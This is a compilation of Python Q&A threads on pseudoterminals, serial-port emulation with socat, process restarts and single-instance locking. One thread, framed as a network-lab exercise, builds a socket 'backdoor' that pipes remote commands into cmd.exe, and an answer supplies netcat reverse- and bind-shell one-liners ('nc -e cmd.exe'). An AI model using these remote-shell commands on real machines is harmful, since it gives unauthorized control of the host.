Pseudoterminal master reads what it has just written - python

I'm working on a project that interfaces "virtual devices" (Python processes) that use serial-port connections with real devices that also use serial ports. I'm using pseudoterminals to connect several (more than two) of these serial-communication processes (modeling serial devices) together, and I've hit a snag.
I've got a Python process that generates pseudoterminals and symlinks the slave end of each pty to a file, so that the other processes can open a pyserial object on that filename. The master ends are kept by the pty-generating process and read; when data comes in on one master, it is logged and then written to the other masters. This approach works as long as the listening process is always there.
The problem arises when a virtual device dies or is never started (which is a valid use case for this project). It seems that, on my system, if data is written to the master end of a pty while nothing is reading the slave end, calling read on that master returns the data that was just written! This means that devices receive the same data more than once -- not good!
Example:
>>> master, slave = pty.openpty()
>>> os.write(master, "Hello!")
6
>>> os.read(master, 6)
'Hello!'
I would prefer that the call to read() block until the slave sends data. In fact, this is the behavior of the slave device -- it can write, and then os.read(slave,1) will block until the master writes data.
My "virtual devices" need to be able to pass a filename to open a serial port object; I've attempted to symlink the master end, but that causes my virtual devices to open /dev/ptmx, which creates a new pseudoterminal pair instead of linking back to the slaves that already exist!
Is there any way to change the behavior of the master? Or even just get a filename to the master that corresponds to a slave device (not just /dev/ptmx)?
Thanks in advance!

I'm pretty sure this is because echoing is on by default. To borrow from the Python termios docs, you could do:
import os, termios

master, slave = os.openpty()  # os.openpty() is preferred over pty.openpty()
old_settings = termios.tcgetattr(master)
new_settings = termios.tcgetattr(master)  # fetch a second copy so we don't mutate old_settings
new_settings[3] = new_settings[3] & ~termios.ECHO  # index 3 is the lflags field
termios.tcsetattr(master, termios.TCSADRAIN, new_settings)
You can use the following to restore the old settings:
termios.tcsetattr(master, termios.TCSADRAIN, old_settings)
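With echo disabled, the master no longer reads back its own writes. A minimal sketch of the resulting behavior (assuming Linux and Python 3, where os.write needs bytes):
import os, termios

master, slave = os.openpty()
settings = termios.tcgetattr(master)
settings[3] = settings[3] & ~termios.ECHO
termios.tcsetattr(master, termios.TCSADRAIN, settings)

os.write(master, b"Hello!")   # no longer echoed back to the master
os.write(slave, b"reply")     # data written on the slave side...
print(os.read(master, 5))     # ...is what the master reads: b'reply'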

In case someone finds this question, and jszakmeister's answer doesn't work, here is what worked for me.
openpty seems to create ptys in canonical mode with echo turned on, which is not what one might expect. You can change the mode using the tty.setraw function, as in this example of a simple openpty echo server:
import os, tty, termios

master, slave = os.openpty()
tty.setraw(master, termios.TCSANOW)
print("Connect to:", os.ttyname(slave))

while True:
    try:
        data = os.read(master, 10000)
    except OSError:
        break
    if not data:
        break
    os.write(master, data)
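To try the server, run it in one terminal and connect from another using the path it prints. A sketch of a client (pyserial must be installed, and '/dev/pts/5' is just an example; substitute whatever your server printed):
import serial

ser = serial.Serial('/dev/pts/5')  # the path printed by the server
ser.write(b'ping')
print(ser.read(4))  # b'ping', echoed back by the server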

Related

Python : http.server.HTTPServer : How to close ALL opened files?

So basically, I am making an HTTP webhooks server in Python 3 and wanted to add a restart function because shell access is very limited on the server it will be running on.
I found this snippet somewhere on Stack Overflow earlier:
import os, sys, logging, psutil

def restart_program():
    """Restarts the current program, with file objects and descriptors
    cleanup
    """
    try:
        p = psutil.Process(os.getpid())
        fds = p.open_files() + p.connections()
        print(fds)
        for handler in fds:
            os.close(handler.fd)
    except Exception as e:
        logging.error(e)
    python = sys.executable
    os.execl(python, python, *sys.argv)
For the most part it works, but I wanted to make sure, so I ran a few tests with lsof and found that every time I restarted the server, two more lines (files) were added to the list of open files:
python3 13923 darwin 5u systm 0x18cd0c0bebdcbfd7 0t0 [ctl com.apple.netsrc id 9 unit 36]
python3 13923 darwin 6u unix 0x18cd0c0beb8fc95f 0t0 ->0x18cd0c0beb8fbcdf
(the addresses vary on each restart)
These are only present when I initiate httpd = ThreadingSimpleServer((host, port), Handler). But even after I call httpd.server_close() these open files persist and psutil doesn't seem to find them.
This isn't really a required feature. If it proves to be too much overhead I can drop it, but right now I am only interested in why my code doesn't work, and in a solution, for my own sanity.
Thanks in advance!
UPDATE:
Changing p.connections() to p.connections(kind='all') got me the unix type fd. Still not sure how to close the systm type fd. Turns out the unix fd had to do with DNS...
UPDATE:
Well, it looks like I found a solution, however messy it may be.
class MyFileHandler(object):
    """Minimal wrapper exposing a .fd attribute, like psutil's objects."""
    def __init__(self, fd):
        super(MyFileHandler, self).__init__()
        self.fd = fd

def get_open_systm_files(pid=os.getpid()):
    proc = subprocess.Popen(['lsof', '-p', str(pid)], stdout=subprocess.PIPE)
    return [MyFileHandler(int(str(l).split(' ')[6][:-1]))
            for l in proc.stdout.readlines() if b'systm' in l]
def restart_program():
    """Restarts the current program, with file objects and descriptors
    cleanup
    """
    try:
        p = psutil.Process(os.getpid())
        fds = p.open_files() + p.connections()
        print(fds)
        for handler in fds:
            os.close(handler.fd)
    except Exception as e:
        logging.error(e)
    python = sys.executable
    os.execl(python, python, *sys.argv)
It's not pretty, but it works.
If anyone could shed some light on what actually is/was going on I would very much like to know.
Mmm, that looks like a very hackish way to restart a process, and a bad idea in general. What is your use case? Why do you want to restart a process to begin with? Regardless of your motivations, the usual way to interact with processes in that sense is via signals. I am not aware of signals designed specifically to restart a process, though. What you usually want to do is terminate it (SIGTERM) and have something like systemd or zdaemon automatically restart it. You can even write a signal handler to execute cleanup functions on SIGTERM, and that is the correct way to do cleanup. You don't usually want to restart a process, though, let alone do it from the app itself. That looks like a recipe for trouble.
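For what it's worth, a minimal sketch of that SIGTERM-handler idea (cleanup() here is a hypothetical stand-in for whatever your app needs to do):
import signal, sys

def handle_sigterm(signum, frame):
    cleanup()    # hypothetical: close sockets, flush logs, remove temp files
    sys.exit(0)  # exit cleanly so systemd/zdaemon can restart the process

signal.signal(signal.SIGTERM, handle_sigterm)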

Python os.read blocks until newline character

I have an XBee plugged into a Raspberry PI. Here is the Python 3.4 code I am using:
import os

f = os.open("/dev/ttyUSB0", os.O_RDWR | os.O_NONBLOCK)
print("Writing...")
b = bytes("hello", "utf-8")
os.write(f, b)
print("Press return to start read")
cmd = input()
print("Reading...")
ret = os.read(f, 10)
if ret == None:
    print("ret = None")
else:
    print("ret = {}".format(ret))
os.close(f)
Yesterday, this all worked as I expected. The read command returned immediately, with zero bytes if there wasn't anything to read.
Today I added code to another part of the project that writes to a text file and includes a thread RLock. Now the above code does something different. If there are no bytes waiting to be read, or there are bytes waiting that don't end with a 0x0D, I get an error:
BlockingIOError: [Errno 11] Resource temporarily unavailable
But if there are bytes waiting to be read that end with a 0x0D, the read function returns those bytes, including the 0x0D.
Update: I have reformated the system, and the fault has not gone away, which suggests it wasn't the addition of the file and thread locking code that caused the problem.
I ran minicom and the problem has gone away, so maybe I should be doing something with serial configuration on the device before I open it as a file?
This is the line that returns the os.read to its original behaviour:
minicom -b 9600 -o -D /dev/ttyUSB0
I strongly suspect that the two different behaviours are related to the CTS/RTS flow control settings on the serial port. Try turning CTS/RTS on or off to get the behaviour you want.
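For example, you could open the port through pyserial with explicit flow-control settings, rather than through os.open, so you don't inherit whatever state the last program left the UART in. A sketch (the values here are assumptions to experiment with):
import serial

ser = serial.Serial('/dev/ttyUSB0', baudrate=9600,
                    rtscts=False,   # try True/False to match minicom's behaviour
                    xonxoff=False,
                    timeout=1)
ser.write(b'hello')
print(ser.read(10))
ser.close()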

python subprocess stdin.write a string error 22 invalid argument

I have two Python files communicating over a socket. When I pass the data I received to stdin.write, I get error 22, invalid argument. The code:
a="C:\python27\Tools"
proc = subprocess.Popen('cmd.exe', cwd=a ,universal_newlines = True, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
data = s.recv(1024) # s is the socket i created
proc.stdin.write(data) ##### ERROR in this line
output = proc.stdout.readline()
print output.rstrip()
remainder = proc.communicate()[0]
print remainder
Update
OK, basically I want to create something like a backdoor on a system, in a localhost inside a network lab. This is for educational purposes. I have two machines. 1) is running Ubuntu, and I have this code in the server:
import socket, sys

s = socket.socket()
host = "192.168.2.7"  # the server's IP
port = 1234
s.bind((host, port))
s.listen(1)  # wait for client connection
c, addr = s.accept()  # establish connection with client
print 'Got connection from', addr
c.send('Thank you for connecting')
while True:
    command_from_user = raw_input("Give your command: ")  # read command from the user
    if command_from_user == 'quit':
        break
    c.send(command_from_user)  # send the command to the client
c.close()  # close the connection
And I have this code for the client:
import socket
import sys
import subprocess, os

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print 'Socket created'
host = "192.168.2.7"  # IP of the server machine
port = 1234
s.connect((host, port))  # open a TCP connection to hostname on the port
print s.recv(1024)
a = "C:\python27\Tools"
proc = subprocess.Popen('cmd.exe', cwd=a, universal_newlines=True,
                        stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                        stdin=subprocess.PIPE)
while True:
    data = s.recv(1024)
    if (data == "") or (data == "quit"):
        break
    proc.stdin.write('%s\n' % data)
    proc.stdin.flush()
    remainder = proc.communicate()[0]
    print remainder
stdoutput = proc.stdout.read() + proc.stderr.read()
s.close  # closing the socket
The error is in the client file:
Traceback (most recent call last):
  File "ex1client2.py", line 50, in <module>
    proc.stdin.write('%s\n' % data)
ValueError: I/O operation on closed file
Basically, I want to run commands from the server on the client one after another and get the output back on the server. The first command is executed; on the second command I get the error shown above.
The main problem which led me to this solution is the change-directory command: when I execute cd "path", the directory doesn't change.
Your new code has a different problem, which is why it raises a similar but different error. Let's look at the key part:
while True:
    data = s.recv(1024)
    if (data == "") or (data == "quit"):
        break
    proc.stdin.write('%s\n' % data)
    proc.stdin.flush()
    remainder = proc.communicate()[0]
    print remainder
stdoutput = proc.stdout.read() + proc.stderr.read()
The problem is that each time through this loop, you're calling proc.communicate(). As the docs explain, this will:
Send data to stdin. Read data from stdout and stderr, until end-of-file is reached. Wait for process to terminate.
So, after this call, the child process has quit, and the pipes are all closed. But the next time through the loop, you try to write to its input pipe anyway. Since that pipe has been closed, you get ValueError: I/O operation on closed file, which means exactly what it says.
If you want to run each command in a separate cmd.exe shell instance, you have to move the proc = subprocess.Popen('cmd.exe', …) bit into the loop.
On the other hand, if you want to send commands one by one to the same shell, you can't call communicate; you have to write to stdin, read from stdout and stderr until you know they're done, and leave everything open for the next time through the loop.
The downside of the first one is pretty obvious: if you do a cd \Users\me\Documents in the first command, then dir in the second command, and they're running in completely different shells, you're going to end up getting the directory listing of C:\python27\Tools rather than C:\Users\me\Documents.
But the downside of the second one is pretty obvious too: you need to write code that somehow either knows when each command is done (maybe because you get the prompt again?), or that can block on proc.stdout, proc.stderr, and s all at the same time. (And without accidentally deadlocking the pipes.) And you can't even toss them all into a select, because the pipes aren't sockets. So, the only real option is to create a reader thread for stdout and another one for stderr, or to get one of the async subprocess libraries off PyPI, or to use twisted or another framework that has its own way of doing async subprocess pipes.
If you look at the source to communicate, you can see how the threading should work.
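To give the flavor of it, here's a rough sketch of the reader-thread approach (Python 2, to match your code; this is an outline, not a drop-in fix):
import threading
from Queue import Queue

def drain(pipe, q):
    # read lines until the pipe closes, handing them to the main loop
    for line in iter(pipe.readline, ''):
        q.put(line)

q = Queue()
threading.Thread(target=drain, args=(proc.stdout, q)).start()
threading.Thread(target=drain, args=(proc.stderr, q)).start()
# the main loop can now pull lines with q.get() without blocking
# on one pipe while the other fills up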
Meanwhile, as a side note, your code has another very serious problem. You're expecting that each s.recv(1024) is going to return you one command. That's not how TCP sockets work. You'll get the first 2-1/2 commands in one recv, and then 1/4th of a command in the next one, and so on.
On localhost, or even a home LAN, when you're just sending a few small messages around, it will work 99% of the time, but you still have to deal with that 1% or your code will just mysteriously break sometimes. And over the internet, and even many real LANs, it will only work 10% of the time.
So, you have to implement some kind of protocol that delimits messages in some way.
Fortunately, for simple cases, Python gives you a very easy solution to this: makefile. When commands are delimited by newlines, and you can block synchronously until you've got a complete command, this is trivial. Instead of this:
while True:
    data = s.recv(1024)
… just do this:
f = s.makefile()
while True:
    data = f.readline()
You just need to remember to close both f and s later (or s right after the makefile, and f later). A more idiomatic use is:
with s.makefile() as f:
    s.close()
    for data in f:
One last thing:
OK, basically I want to create something like a backdoor on a system, in a localhost inside a network lab
"localhost" means the same machine you're running one, so "a localhost inside a network lab" doesn't make sense. I assume you just meant "host" here, in which case the whole thing makes sense.
If you don't need to use Python, you can do this whole thing with a one-liner using netcat. There are a few different versions with slightly different syntax. I believe Ubuntu comes with GNU netcat built-in; if not, it's probably installable with apt-get install netcat or apt-get install nc. Windows doesn't come with anything, but you can get ports of almost any variant.
A quick google for "netcat remote shell" turned up a bunch of blog posts, forum messages, and even videos showing how to do this, such as Using Netcat To Spawn A Remote Shell, but you're probably better off googling for netcat tutorials instead.
The more usual design is to have the "backdoor" machine (your Windows box) listen on a port, and the other machine (your Ubuntu) connect to it, so that's what most of the blog posts/etc. will show you. The advantage of this direction is that your backdoor server listens forever—you can connect up, do some stuff, quit, connect up again later, etc. without having to go back to the Windows box and start a new connection.
But the other way around, with a backdoor client on the Windows box, is just as easy. On your Ubuntu box, start a server that just connects the terminal to the first connection that comes in:
nc -l -p 1234
Then on your Windows box, make a connection to that server, and connect it up to cmd.exe. Assuming you've installed a GNU-syntax variant:
nc -e cmd.exe 192.168.2.7 1234
That's it. A lot simpler than writing it in Python.
For the more typical design, the backdoor server on Windows runs this:
nc -k -l -p 1234 -e cmd.exe
And then you connect up from Ubuntu with:
nc windows.machine.address 1234
Or you can even add -t to the backdoor server, and just connect up with telnet instead of nc.
The problem is that you're not actually opening a subprocess at all, so the pipe is getting closed, so you're trying to write to something that doesn't exist. (I'm pretty sure POSIX guarantees that you'll get an EPIPE here, but on Windows, subprocess isn't using a POSIX pipe in the first place, so there's no guarantee of exactly what you're going to get. But you're definitely going to get some error.)
And the reason that happens is that you're trying to open a program named '\n' (as in a newline, not a backslash and an n). I don't think that's even legal on Windows. And, even if it is, I highly doubt you have an executable named '\n.exe' or the like on your path.
This would be much easier to see if you weren't using shell=True. In that case, the Popen itself would raise an exception (an ENOENT), which would tell you something like:
OSError: [Errno 2] No such file or directory: '
'
… which would be much easier to understand.
In general, you should not be using shell=True unless you really need some shell feature. And it's very rare that you need a shell feature and also need to manually read and write the pipes.
It would also be less confusing if you didn't reuse data to mean two completely different things (the name of the program to run, and the data to pass from the socket to the pipe).

Virtual Serial Device in Python?

I know that I can use e.g. pySerial to talk to serial devices, but what if I don't have a device right now but still need to write a client for it? How can I write a "virtual serial device" in Python and have pySerial talk to it, like I would, say, run a local web server? Maybe I'm just not searching well, but I've been unable to find any information on this topic.
This is something I did, and it has worked for me so far:
import os, pty, serial
master, slave = pty.openpty()
s_name = os.ttyname(slave)
ser = serial.Serial(s_name)
# To Write to the device
ser.write('Your text')
# To read from the device
os.read(master,1000)
If you create more virtual ports you will have no problems as the different masters get different file descriptors even if they have the same name.
If you are running Linux you can use the socat command for this, like so:
socat -d -d pty,raw,echo=0 pty,raw,echo=0
When the command runs, it will inform you of which serial ports it has created. On my machine this looks like:
2014/04/23 15:47:49 socat[31711] N PTY is /dev/pts/12
2014/04/23 15:47:49 socat[31711] N PTY is /dev/pts/13
2014/04/23 15:47:49 socat[31711] N starting data transfer loop with FDs [3,3] and [5,5]
Now I can write to /dev/pts/13 and receive on /dev/pts/12, and vice versa.
I was able to emulate an arbitrary serial port ./foo using this code:
SerialEmulator.py
import os, subprocess, serial, time

# This script lets you emulate a serial device.
# The client program should use the serial port file specified by client_port.
# If the port is a location that the user can't access (e.g. /dev/ttyUSB0),
# sudo is required.

class SerialEmulator(object):
    def __init__(self, device_port='./ttydevice', client_port='./ttyclient'):
        self.device_port = device_port
        self.client_port = client_port
        cmd = ['/usr/bin/socat', '-d', '-d',
               'PTY,link=%s,raw,echo=0' % self.device_port,
               'PTY,link=%s,raw,echo=0' % self.client_port]
        self.proc = subprocess.Popen(cmd, stdout=subprocess.PIPE,
                                     stderr=subprocess.PIPE)
        time.sleep(1)
        self.serial = serial.Serial(self.device_port, 9600, rtscts=True, dsrdtr=True)
        self.err = ''
        self.out = ''

    def write(self, out):
        self.serial.write(out)

    def read(self):
        line = ''
        while self.serial.inWaiting() > 0:
            line += self.serial.read(1)
        print line

    def __del__(self):
        self.stop()

    def stop(self):
        self.proc.kill()
        self.out, self.err = self.proc.communicate()
socat needs to be installed (sudo apt-get install socat), as well as the pyserial python package (pip install pyserial).
Open the python interpreter and import SerialEmulator:
>>> from SerialEmulator import SerialEmulator
>>> emulator = SerialEmulator('./ttydevice','./ttyclient')
>>> emulator.write('foo')
>>> emulator.read()
Your client program can then wrap ./ttyclient with pyserial, creating the virtual serial port. You could also make client_port /dev/ttyUSB0 or similar if you can't modify the client code, but you might need sudo.
Also be aware of this issue: Pyserial does not play well with virtual port
It may be easier to use something like com0com (if you're on Windows) to set up a virtual serial port and develop against that.
Maybe a loop device will do the job if you need to test your application without access to a device. It's included in pySerial 2.5 https://pythonhosted.org/pyserial/url_handlers.html#loop
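For example (a sketch; serial_for_url with loop:// requires pySerial 2.5 or newer):
import serial

ser = serial.serial_for_url('loop://', timeout=1)
ser.write(b'hello')
print(ser.read(5))  # b'hello' -- everything written is looped back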
It depends a bit on what you're trying to accomplish now...
You could wrap access to the serial port in a class and write an implementation to use socket I/O or file I/O. Then write your serial I/O class to use the same interface and plug it in when the device is available. (This is actually a good design for testing functionality without requiring external hardware.)
Or, if you are going to use the serial port for a command line interface, you could use stdin/stdout.
Or, there's this other answer about virtual serial devices for linux.

Ensure a single instance of an application in Linux

I'm working on a GUI application in WxPython, and I am not sure how I can ensure that only one copy of my application is running at any given time on the machine. Due to the nature of the application, running more than once doesn't make any sense, and will fail quickly. Under Win32, I can simply make a named mutex and check that at startup. Unfortunately, I don't know of any facilities in Linux that can do this.
I'm looking for something that will automatically be released should the application crash unexpectedly. I don't want to have to burden my users with having to manually delete lock files because I crashed.
The Right Thing is advisory locking using flock(LOCK_EX); in Python, this is found in the fcntl module.
Unlike pidfiles, these locks are always automatically released when your process dies for any reason, have no race conditions relating to file deletion (as the file doesn't need to be deleted to release the lock), and there's no chance of a different process inheriting the PID and thus appearing to validate a stale lock.
If you want unclean shutdown detection, you can write a marker (such as your PID, for traditionalists) into the file after grabbing the lock, and then truncate the file to 0-byte status before a clean shutdown (while the lock is being held); thus, if the lock is not held and the file is non-empty, an unclean shutdown is indicated.
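A sketch of that marker scheme (the lock path is an arbitrary choice here; error handling is omitted for brevity):
import fcntl, os

fp = open('/tmp/myapp.lock', 'a+')  # illustrative path
fcntl.flock(fp, fcntl.LOCK_EX | fcntl.LOCK_NB)  # raises IOError if another instance holds it

# we hold the lock; a non-empty file means the previous run died uncleanly
fp.seek(0)
if fp.read():
    print("previous run did not shut down cleanly")

# write the marker while holding the lock
fp.seek(0)
fp.truncate()
fp.write(str(os.getpid()))
fp.flush()

# ... application runs ...

# clean shutdown: truncate the marker, still holding the lock
fp.seek(0)
fp.truncate()
fp.close()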
Complete locking solution using the fcntl module:
import fcntl, sys

pid_file = 'program.pid'
fp = open(pid_file, 'w')
try:
    fcntl.lockf(fp, fcntl.LOCK_EX | fcntl.LOCK_NB)
except IOError:
    # another instance is running
    sys.exit(1)
There are several common techniques, including using semaphores. The one I see used most often is to create a "pid lock file" on startup that contains the pid of the running process. If the file already exists when the program starts, open it and grab the pid inside; check whether a process with that pid is running; if it is, check the cmdline value in /proc/<pid> to see if it is an instance of your program, and if so, quit. Otherwise, overwrite the file with your own pid. The usual name for the pid file is application_name.pid.
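A sketch of that pidfile check (Linux-only, since it reads /proc; the names are illustrative and error handling is omitted):
import os

PID_FILE = '/tmp/application_name.pid'  # illustrative location

if os.path.exists(PID_FILE):
    old_pid = open(PID_FILE).read().strip()
    cmdline_path = '/proc/%s/cmdline' % old_pid
    if os.path.exists(cmdline_path) and 'myapp' in open(cmdline_path).read():
        raise SystemExit('already running')

open(PID_FILE, 'w').write(str(os.getpid()))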
wxWidgets offers a wxSingleInstanceChecker class for this purpose: wxPython doc, or wxWidgets doc. The wxWidgets doc has sample code in C++, but the python equivalent should be something like this (untested):
name = "MyApp-%s" % wx.GetUserId()
checker = wx.SingleInstanceChecker(name)
if checker.IsAnotherRunning():
return False
This builds upon the answer by user zgoda. It mainly addresses a tricky concern to do with write access to the lock file. In particular, if the lock file was first created by root, another user foo can no longer successfully rewrite it, due to an absence of write permissions for user foo. The obvious solution seems to be to create the file with write permissions for everyone. This solution also builds upon a different answer by me, having to do with creating a file with such custom permissions. This concern is important in the real world, where your program may be run by any user, including root.
import fcntl, os, stat, tempfile

app_name = 'myapp'  # <-- Customize this value

# Establish lock file settings
lf_name = '.{}.lock'.format(app_name)
lf_path = os.path.join(tempfile.gettempdir(), lf_name)
lf_flags = os.O_WRONLY | os.O_CREAT
lf_mode = stat.S_IWUSR | stat.S_IWGRP | stat.S_IWOTH  # This is 0o222, i.e. 146

# Create lock file
# Regarding umask, see https://stackoverflow.com/a/15015748/832230
umask_original = os.umask(0)
try:
    lf_fd = os.open(lf_path, lf_flags, lf_mode)
finally:
    os.umask(umask_original)

# Try locking the file
try:
    fcntl.lockf(lf_fd, fcntl.LOCK_EX | fcntl.LOCK_NB)
except IOError:
    msg = ('Error: {} may already be running. Only one instance of it '
           'can run at a time.').format(app_name)
    exit(msg)
A limitation of the above code is that if the lock file already existed with unexpected permissions, those permissions will not be corrected.
I would've liked to use /var/run/<appname>/ as the directory for the lock file, but creating this directory requires root permissions. You can make your own decision for which directory to use.
Note that there is no need to open a file handle to the lock file.
Here's the TCP port-based solution:
# Use a listening socket as a mutex against multiple invocations
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('127.0.0.1', 5080))
s.listen(1)
Look for a Python module that interfaces to SYSV semaphores on Unix. The semaphores have a SEM_UNDO flag, which will cause the resources held by a process to be released if the process crashes.
Otherwise, as Bernard suggested, you can use
import os
os.getpid()
And write it to /var/run/application_name.pid. When the process starts, it should check whether the pid in /var/run/application_name.pid is listed in the ps table and quit if it is; otherwise it should write its own pid into the file. In the following, var_run_pid is the pid you read from /var/run/application_name.pid:
cmd = "ps -p %s -o comm=" % var_run_pid
app_name = os.popen(cmd).read().strip()
if len(app_name) > 0:
Already running
The set of functions defined in semaphore.h -- sem_open(), sem_trywait(), etc. -- is the POSIX equivalent, I believe.
If you create a lock file and put the pid in it, you can check your process id against it and tell if you crashed, no?
I haven't done this personally, so take with appropriate amounts of salt. :p
Can you use the 'pidof' utility? If your app is running, pidof will write the Process ID of your app to stdout. If not, it will print a newline (LF) and return an error code.
Example (from bash, for simplicity):
linux# pidof myapp
8947
linux# pidof nonexistent_app
linux#
By far the most common method is to drop a file into /var/run/ called [application].pid which contains only the PID of the running process, or parent process.
As an alternative, you can create a named pipe in the same directory to be able to send messages to the active process, e.g. to open a new file.
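A sketch of the named-pipe idea (the path and message format are arbitrary choices here):
import errno, os

FIFO_PATH = '/tmp/myapp.cmd'  # illustrative path

try:
    os.mkfifo(FIFO_PATH)
except OSError as e:
    if e.errno != errno.EEXIST:
        raise

# in the running instance: block until another process writes a command
with open(FIFO_PATH) as f:
    for line in f:
        print('received command:', line.strip())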
I've made a basic framework for running these kinds of applications when you want to be able to pass the command line arguments of subsequent attempted instances to the first one. An instance will start listening on a predefined port if it does not find an instance already listening there. If an instance already exists, it sends its command line arguments over the socket and exits.
code w/ explanation
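The gist of that approach is something like this sketch (the port number and argument framing are arbitrary choices):
import socket, sys

PORT = 49152  # arbitrary fixed port acting as the mutex

try:
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(('127.0.0.1', PORT))
    srv.listen(1)
    # first instance: accept and process argv sent by later invocations
except socket.error:
    # an instance already exists: forward our args to it and quit
    c = socket.create_connection(('127.0.0.1', PORT))
    c.sendall('\0'.join(sys.argv[1:]).encode())
    c.close()
    sys.exit(0)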
